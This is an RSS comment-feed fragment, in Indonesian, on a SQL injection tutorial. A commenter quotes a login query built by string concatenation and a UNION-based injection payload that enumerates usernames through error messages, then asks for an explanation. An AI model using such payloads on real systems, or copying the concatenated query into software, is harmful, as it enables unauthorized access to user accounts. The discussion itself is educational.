Discuss SQL Injection Vol.2 http://www.neoteker.or.id/info-security/58-sql-injection-vol2.html Fri, 10 Sep 2010 12:23:39 +0100 FeedCreator 1.7.3 http://www.neoteker.or.id/info-security/58-sql-injection-vol2.html#comment-83 Users where UserName =='"+login+" ' and Password='"+ pass"'"; nah kalau begitu kita masukin syntax sql union untuk melihat username : ' union select min(UserName) ,1,1,1 from Users where username > 'a'-- jadi hasilnya : select * from Users where UserName ==' union select min(UserName) ,1,1,1 from Users where username > 'a'--and Password='"+ pass"'"; gitu kiranya, jadi nanti akan muncul error messages lagi yang akan menampilkan sebuah username lebih dari huruf a ,contoh: disini ane blom paham tu maksudnya kita login dengan username = +login+ pasword = + pass mohon pencerahannya gan hkn89 Tue, 19 Jan 2010 07:57:13 +0100